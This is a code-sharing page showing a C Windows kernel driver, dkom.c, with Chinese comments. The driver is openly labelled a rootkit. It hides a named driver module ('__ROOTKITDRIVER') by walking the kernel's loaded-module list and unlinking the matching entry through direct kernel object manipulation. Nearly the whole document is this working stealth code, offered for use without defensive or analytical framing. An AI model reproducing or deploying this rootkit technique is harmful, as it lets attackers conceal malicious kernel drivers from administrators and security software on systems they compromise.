?? dkom.c
字號:
/*///////////////////////////////////////
DKOM方法隱藏驅動模塊 要隱藏的模塊名稱通過
宏 HIDEDRIVER來指定
ineverland@163.com
/*///////////////////////////////////////
#include "ntddk.h"
#include "stdlib.h"
#include "stdio.h"
#include "windef.h"
#define HIDEDRIVER "__ROOTKITDRIVER" //隱藏的進程名
typedef struct _MODULE_ENTRY {
LIST_ENTRY le_mod;
DWORD unknown[4];
DWORD base;
DWORD driver_start;
DWORD unk1;
UNICODE_STRING driver_Path;
UNICODE_STRING driver_Name;
//...
} MODULE_ENTRY, *PMODULE_ENTRY;
VOID UnLoad(IN PDRIVER_OBJECT pDriverObject)
{
DbgPrint("Unload\n");
}
//未使用
void Cheat()
{
PUCHAR ptr;
PUCHAR calladdr;
//ptr=(PUCHAR)NtSetTimer;
// DbgPrint("0x%02x\n",*(PUCHAR)KiDispatchInterrupt);
}
DWORD FindPsLoadedModuleList (IN PDRIVER_OBJECT DriverObject)
{
PMODULE_ENTRY pm_current;
if (DriverObject == NULL)
return 0;
pm_current = *((PMODULE_ENTRY*)((DWORD)DriverObject + 0x14));
if (pm_current == NULL)
return 0;
return (DWORD) pm_current;
}
NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject,IN PUNICODE_STRING pRegistryPath )
{
UNICODE_STRING uni_drivername;
ANSI_STRING drivername;
PMODULE_ENTRY pm_current;
PMODULE_ENTRY pm_driverlist;
NTSTATUS ntStatus;
pDriverObject->DriverUnload = UnLoad;
DbgPrint("the rootkit has been loaded!\n");
drivername.Length = (USHORT) strlen(HIDEDRIVER);
drivername.MaximumLength = (USHORT) strlen(HIDEDRIVER);
drivername.Buffer = (PCHAR)HIDEDRIVER;
pm_driverlist=(PMODULE_ENTRY)FindPsLoadedModuleList(pDriverObject); //得到 driverobject list
ntStatus = RtlAnsiStringToUnicodeString(&uni_drivername, &drivername, TRUE);
if(!NT_SUCCESS(ntStatus))
{
return STATUS_SUCCESS;
}
pm_current=pm_driverlist;
while((PMODULE_ENTRY)pm_current->le_mod.Flink !=pm_driverlist) //遍歷驅動雙鏈表
{
if ((pm_current->unk1 != 0x00000000) && (pm_current->driver_Path.Length != 0))
{
if(RtlCompareUnicodeString(&uni_drivername, &(pm_current->driver_Name), FALSE) == 0) //比較名字 Unicode
{
*((PDWORD)pm_current->le_mod.Blink) = (DWORD) pm_current->le_mod.Flink;
pm_current->le_mod.Flink->Blink = pm_current->le_mod.Blink;
DbgPrint("Just hid %s\n",drivername.Buffer);
break;
}
}
pm_current = (MODULE_ENTRY*)pm_current->le_mod.Flink;
}
if( NT_SUCCESS(ntStatus))
{
RtlFreeUnicodeString(&uni_drivername);
}
return STATUS_SUCCESS;
}
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -